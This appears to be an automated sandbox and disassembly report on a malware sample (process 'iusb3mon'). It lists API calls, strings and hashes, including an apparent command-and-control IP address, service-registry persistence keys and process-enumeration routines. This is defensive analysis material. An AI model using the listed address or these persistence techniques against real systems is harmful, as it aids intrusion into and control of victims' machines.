String ID: %s.exe$%s\%s
API String ID: 832629782-3574828809
Opcode ID: e96522365e5fb29ae21edfd56546fb6fccb38db0e59c1c3bf54b351d1e3a9a11
Instruction ID: 9b4cb31bde9034427bf170741e181424c7a2322a5ec1b6e2f53f627c898b7cd7
Opcode Fuzzy Hash: e96522365e5fb29ae21edfd56546fb6fccb38db0e59c1c3bf54b351d1e3a9a11
Instruction Fuzzy Hash: B9313EB280011DBBEB609BE0DC88EEB777DEB44315F040592B709E6150EA74DA888FA0

Function 06CF5643 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 81stringtimeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06CF5660
strlen.MSVCRT ref: 06CF5685

Part of subcall function 06CF9423: LoadLibraryA.KERNEL32(ADVAPI32.dll,Console,80000001,06D1CB7A,?,00000000,06CFADE0,06D0E538,000000FF,?,06CF56BE,80000001,Console,Groupfenzhu,00000001,06D1CB7A), ref: 06CF9450
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 06CF9467
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 06CF9472
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 06CF947D
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 06CF9488
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 06CF9493
Part of subcall function 06CF9423: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 06CF949E
Part of subcall function 06CF9423: FreeLibrary.KERNEL32(00000000,?,00000000,06CFADE0,06D0E538,000000FF,?,06CF56BE,80000001,Console,Groupfenzhu,00000001), ref: 06CF9592

strlen.MSVCRT ref: 06CF56A7
GetLocalTime.KERNEL32(?), ref: 06CF56C5
wsprintfA.USER32 ref: 06CF56ED
strlen.MSVCRT ref: 06CF56FC

Strings

Console, xrefs: 06CF5674, 06CF5695, 06CF56B7, 06CF570F
%4d-%.2d-%.2d %.2d:%.2d, xrefs: 06CF56E7
Remarkbeizhu, xrefs: 06CF5690
Groupfenzhu, xrefs: 06CF56B2
InstallTime, xrefs: 06CF570A
SYSTEM\CurrentControlSet\Services\%s, xrefs: 06CF565A
143.92.60.116, xrefs: 06CF564E

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
String ID: %4d-%.2d-%.2d %.2d:%.2d$143.92.60.116$Console$Groupfenzhu$InstallTime$Remarkbeizhu$SYSTEM\CurrentControlSet\Services\%s
API String ID: 124699875-3082003596
Opcode ID: f8c5468c6df7da7e0e672925151d26131d34da8304dbc2ce85cbdf3316f3161d
Instruction ID: 4a5954300a7d4e194be83fe6375fd206e066dfe2e4b7a22afff4833dcb8458b9
Opcode Fuzzy Hash: f8c5468c6df7da7e0e672925151d26131d34da8304dbc2ce85cbdf3316f3161d
Instruction Fuzzy Hash: 6E21A5B2A502147BDBA0ABA5ED4AFFB777DEB18B01F040445BB05E5281E6F9C9448370

Function 06CF12D2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 55networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF12D7
WSAStartup.WS2_32(00000202,?), ref: 06CF1328
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 06CF1333

Strings

k, xrefs: 06CF1359
x, xrefs: 06CF1369
m, xrefs: 06CF1355
g, xrefs: 06CF134D
8, xrefs: 06CF1351
, xrefs: 06CF136D
h, xrefs: 06CF1365
y, xrefs: 06CF135D
q, xrefs: 06CF1361

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CreateEventH_prologStartup
String ID: $8$g$h$k$m$q$x$y
API String ID: 2400729181-2346024814
Opcode ID: afec26c871c480a00614ea8975cc37f485725ba75463f30fce6e4490a58998fa
Instruction ID: af8e13f4455014f9f4decb4d5edebd78eddff527110b9c1d91df3de15b8664b7
Opcode Fuzzy Hash: afec26c871c480a00614ea8975cc37f485725ba75463f30fce6e4490a58998fa
Instruction Fuzzy Hash: 0821A1309043C5DEE791DBA8C9497EEBFF89F11348F04055D9592A2782DBB5560CCBB2

Function 06CF90D0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderstringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?), ref: 06CF90E1
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 06CF90F5
GetProcAddress.KERNEL32(00000000,Process32First), ref: 06CF90FF
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 06CF910A
lstrcmpiA.KERNEL32(?,?), ref: 06CF9142
CloseHandle.KERNEL32(00000000,?,?), ref: 06CF9161
FreeLibrary.KERNEL32(00000000,?,?), ref: 06CF916C

Strings

Process32First, xrefs: 06CF90F7
CreateToolhelp32Snapshot, xrefs: 06CF90EF
kernel32.dll, xrefs: 06CF90DC
Process32Next, xrefs: 06CF9101

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
API String ID: 1314729832-4285911020
Opcode ID: b665571481333f80a68036bbe86208f47595caa50bfc529f55d78aee741d9ac5
Instruction ID: 989a0a6485d0b2e83eedf5b13495add8680500cc6a0afea655b8522b88abf7a2
Opcode Fuzzy Hash: b665571481333f80a68036bbe86208f47595caa50bfc529f55d78aee741d9ac5
Instruction Fuzzy Hash: 96115431E01218BBEB619B619C4DFEEBBBDEF45750F0044A5FA00E2240D7B4DB04CA91

Function 06CF3FC8 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 178stringprocessCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06CF40AA
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 06CF410F
lstrcatA.KERNEL32(?,06D17D6C), ref: 06CF4155
lstrcatA.KERNEL32(?,06CF42C0), ref: 06CF4161
lstrcpyA.KERNEL32(00000000,06CF42C0), ref: 06CF4169
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06CF41AF

Strings

%s\shell\open\command, xrefs: 06CF40A4
WinSta0\Default, xrefs: 06CF4185
D, xrefs: 06CF417C
"%1, xrefs: 06CF411B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateEnvironmentExpandProcessStringslstrcpywsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 2973130283-33419044
Opcode ID: dfba53450cafc9d5576d72eb5899f4033ee37a264a36f0b96f10525abd4efb22
Instruction ID: 83ab7ad9b0121d46a3ec88afb0936dd21d1fc1d89e73ed5ced16f7771a932f4f
Opcode Fuzzy Hash: dfba53450cafc9d5576d72eb5899f4033ee37a264a36f0b96f10525abd4efb22
Instruction Fuzzy Hash: F75176B291021DBEEF909BE0DC88FEB777CEB54305F0044A6E715E6141D671DB899B60

Function 04EC1891 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04EC1896

Strings

y, xrefs: 04EC191C
q, xrefs: 04EC1920
k, xrefs: 04EC1918
m, xrefs: 04EC1914
g, xrefs: 04EC190C
, xrefs: 04EC192C
h, xrefs: 04EC1924
x, xrefs: 04EC1928
8, xrefs: 04EC1910

Memory Dump Source

Source File: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_4ec0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: $8$g$h$k$m$q$x$y
API String ID: 3519838083-2346024814
Opcode ID: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
Instruction ID: 33c6a3a31de926ddafc80be98bb3a261d8fa3ee2eccce1efc2a7eb133a9cc8df
Opcode Fuzzy Hash: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
Instruction Fuzzy Hash: B621A470D04385DEE711DBA8C9497EFBFF99F11308F04459EE08267282D7B56A08CB62

Function 06CF74E9 Relevance: 16.5, APIs: 2, Strings: 9, Instructions: 37stringCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF739A: wsprintfA.USER32 ref: 06CF7480

lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 06CF7532
lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 06CF754A

Strings

e, xrefs: 06CF751F
MarkTime, xrefs: 06CF74F4, 06CF74FB
T, xrefs: 06CF7513
k, xrefs: 06CF750F
m, xrefs: 06CF751B
i, xrefs: 06CF7517
r, xrefs: 06CF750B
a, xrefs: 06CF7507
M, xrefs: 06CF7503

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: lstrlen$wsprintf
String ID: M$MarkTime$T$a$e$i$k$m$r
API String ID: 1220175532-2269700615
Opcode ID: c6d2734ac867599ac19fc1d1130c60d5275f22574a90782857fc263113f7a5b0
Instruction ID: efcc69cfac5b0a14ebdee1fed960e6f35fbf1f1f1bed8ce1db3f5807febae660
Opcode Fuzzy Hash: c6d2734ac867599ac19fc1d1130c60d5275f22574a90782857fc263113f7a5b0
Instruction Fuzzy Hash: 1501F910D042C8F9DF0297A5DC05BDEBF7A9F52708F0480D9E95067282D3BA5229D772

Function 06CF54A3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 118sleepstringsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF54A8

Part of subcall function 06CF12D2: __EH_prolog.LIBCMT ref: 06CF12D7
Part of subcall function 06CF12D2: WSAStartup.WS2_32(00000202,?), ref: 06CF1328
Part of subcall function 06CF12D2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 06CF1333

lstrcatA.KERNEL32(?,06D1CA18), ref: 06CF54F7
_rand.LIBCMT ref: 06CF5503
Sleep.KERNEL32(00000BB8), ref: 06CF550D
GetTickCount.KERNEL32 ref: 06CF553D
GetTickCount.KERNEL32 ref: 06CF5559
WaitForSingleObject.KERNEL32(?,00000064), ref: 06CF55DF
Sleep.KERNEL32(000001F4), ref: 06CF55EC

Part of subcall function 06CF180D: setsockopt.WS2_32(?,0000FFFF,00000080,06CF546D,00000004), ref: 06CF1832
Part of subcall function 06CF180D: CancelIo.KERNEL32(?), ref: 06CF183B
Part of subcall function 06CF180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06CF1847
Part of subcall function 06CF180D: closesocket.WS2_32(?), ref: 06CF1850
Part of subcall function 06CF180D: SetEvent.KERNEL32(?), ref: 06CF1859

Part of subcall function 06CF1AD3: __EH_prolog.LIBCMT ref: 06CF1AD8
Part of subcall function 06CF1AD3: TerminateThread.KERNEL32(?,000000FF,00000000,00000000,00006365,?,06CF5486), ref: 06CF1B00
Part of subcall function 06CF1AD3: CloseHandle.KERNEL32(?,?,06CF5486), ref: 06CF1B08

Strings

143.92.60.116, xrefs: 06CF5574

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedObjectSingleStartupTerminateThreadWait_randclosesocketlstrcatsetsockopt
String ID: 143.92.60.116
API String ID: 2260043707-3891370194
Opcode ID: 356405029d3393774274f559f4ed033be061b021f5465701df28ca59dbf054fc
Instruction ID: 2886c08fe55ed37b0534cd274491877b501e75451f991a480809f0ac65bc253e
Opcode Fuzzy Hash: 356405029d3393774274f559f4ed033be061b021f5465701df28ca59dbf054fc
Instruction Fuzzy Hash: 2E41E772D24259EEDFE4EBA4DC04BDDBBB9AF21304F440099D319A7280DF754A89DB50

Function 06CF3568 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 114stringCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(CTXOPConntion_Class,00000000), ref: 06CF35CF
GetClassNameA.USER32(?,00000000,00000104), ref: 06CF3602
GetWindowTextA.USER32(?,?,00000104), ref: 06CF362B
lstrlenA.KERNEL32(?), ref: 06CF3662
GetWindow.USER32(?,00000002), ref: 06CF3691
lstrlenA.KERNEL32(?), ref: 06CF369F

Strings

-/-, xrefs: 06CF36AC
CTXOPConntion_Class, xrefs: 06CF35C6, 06CF35CD, 06CF360E
_, xrefs: 06CF363F

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$lstrlen$ClassFindNameText
String ID: -/-$CTXOPConntion_Class$_
API String ID: 4118851945-591102176
Opcode ID: 5919d902b83ffb7ba83245d081787c4fecdd563149ba4995060a01e58593becf
Instruction ID: 0040b03a2ae5f3b2ee259f744d3e6fbccf6cc169412c17282537fe22f86fd31f
Opcode Fuzzy Hash: 5919d902b83ffb7ba83245d081787c4fecdd563149ba4995060a01e58593becf
Instruction Fuzzy Hash: 8731D772914148BEEFD19BA4DC05BDEBBB9EB04300F1044F5E309E6290DBB19B849F54

Function 06D09390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06D09395
GetPropA.USER32(?,AfxOldWndProc423), ref: 06D093AD
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 06D0940B

Part of subcall function 06D08F78: GetWindowRect.USER32(?,?), ref: 06D08F9D
Part of subcall function 06D08F78: GetWindow.USER32(?,00000004), ref: 06D08FBA

SetWindowLongA.USER32(?,000000FC,?), ref: 06D0943B
RemovePropA.USER32(?,AfxOldWndProc423), ref: 06D09443
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 06D0944A
GlobalDeleteAtom.KERNEL32(00000000), ref: 06D09451

Part of subcall function 06D08F55: GetWindowRect.USER32(?,?), ref: 06D08F61

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 06D094A5

Strings

AfxOldWndProc423, xrefs: 06D093A3, 06D093AB, 06D09441, 06D09449

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: 5caefa50fe7e15f3d37fd9235bf6ca33de267e3941e6dd4eb5fac1dd1a414f96
Instruction ID: dd5a44cb5316589522345e849922fb1432a401b9672d50733eb19bece803b8d1
Opcode Fuzzy Hash: 5caefa50fe7e15f3d37fd9235bf6ca33de267e3941e6dd4eb5fac1dd1a414f96
Instruction Fuzzy Hash: D131673280021ABBEF91AFB4DD58FBF7F79EF09211F000519F621A6291C7758A149BA5

Function 06D0C5BA Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000001C,06D26588,00000100,?,00000000,00000000,06D0C863,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773,?,?), ref: 06D0C5C9
GlobalAlloc.KERNEL32(00002002,?,?,?,00000000,00000000,06D0C863,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773,?,?), ref: 06D0C61E
GlobalHandle.KERNEL32(?), ref: 06D0C627
GlobalUnlock.KERNEL32(00000000), ref: 06D0C630
GlobalReAlloc.KERNEL32(00000000,?,00002002), ref: 06D0C642
GlobalHandle.KERNEL32(?), ref: 06D0C659
GlobalLock.KERNEL32(00000000), ref: 06D0C660
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,06D0C863,?,00000100,06D0C48E,06D0C4D2,06D087DA,00000100,06D08773,?,?,00000100), ref: 06D0C666
GlobalLock.KERNEL32(?), ref: 06D0C675
LeaveCriticalSection.KERNEL32(?), ref: 06D0C6BE

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: c09ef2829bd66bacee20519f7998ea488c22c31ed64d14fc9bea959c96c07d9c
Instruction ID: fe0747c6cc3ec588835729244118410614f1579141c1f98b1ca675a642f1fd94
Opcode Fuzzy Hash: c09ef2829bd66bacee20519f7998ea488c22c31ed64d14fc9bea959c96c07d9c
Instruction Fuzzy Hash: 4F3172756107059FF7649F28DC89B2AB7E9FB45201B004E2DF966C3790E771E808CB51

Function 04ECDC56 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 469COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 04ECE058
__aulldiv.LIBCMT ref: 04ECE06A

Strings

9, xrefs: 04ECE06F
', xrefs: 04ECDED0
g, xrefs: 04ECDDE7
, xrefs: 04ECE0DF
g, xrefs: 04ECDE70
@, xrefs: 04ECDFD1

Memory Dump Source

Source File: 00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_4ec0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: __aulldiv__aullrem
String ID: $'$9$@$g$g
API String ID: 3839614884-2311196974
Opcode ID: 623da7cb9067cec10be50fd8bcdce45f781f768c5608f194e8465b0d7b52ac49
Instruction ID: 454ecd0fc5282ca65fd534fdfb224a887977c0bfe9a3716c6f82b3762499697d
Opcode Fuzzy Hash: 623da7cb9067cec10be50fd8bcdce45f781f768c5608f194e8465b0d7b52ac49
Instruction Fuzzy Hash: 8002A071D04249EEEF14DF98CE44BEDBBB5FF04318F14A1ADD811A6280E776AA42CB50

Function 00C08D60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00C08D97
___except_validate_context_record.LIBVCRUNTIME ref: 00C08D9F
_ValidateLocalCookies.LIBCMT ref: 00C08E28
__IsNonwritableInCurrentImage.LIBCMT ref: 00C08E53
_ValidateLocalCookies.LIBCMT ref: 00C08EA8
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00C08EBE
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00C08ED3

Strings

csm, xrefs: 00C08E3D

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
String ID: csm
API String ID: 1385549066-1018135373
Opcode ID: 559f51d699278c0af649af2ec91068661766af32f9b556f759ab89f1ac02e8d9
Instruction ID: 1819be85bdfc386c085abd15993a4989f7b78b0b76ff643b46e2d4962066a4a0
Opcode Fuzzy Hash: 559f51d699278c0af649af2ec91068661766af32f9b556f759ab89f1ac02e8d9
Instruction Fuzzy Hash: 4241B538A00219EBCF10DF68C885B9EBBB5EF45314F14C195E9649B3D2CB319E4ADB91

Function 06CF3777 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82filelibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06CF3788
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06CF37B8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06CF37D1
GetFileSize.KERNEL32(00000000,00000000), ref: 06CF37D9
_rand.LIBCMT ref: 06CF381A
WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 06CF384F
CloseHandle.KERNEL32(?), ref: 06CF3860

Strings

KERNEL32.dll, xrefs: 06CF3783

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleLibraryLoadPointerSizeWrite_rand
String ID: KERNEL32.dll
API String ID: 2551126021-254546324
Opcode ID: ae951b8b0ff28d42b3e753f5271b96f8be84706add97276c541d65e276415071
Instruction ID: 1a81c9f0ee2c7339eb70b17685d435381a1923bc246fc2933a37caeeb170bed4
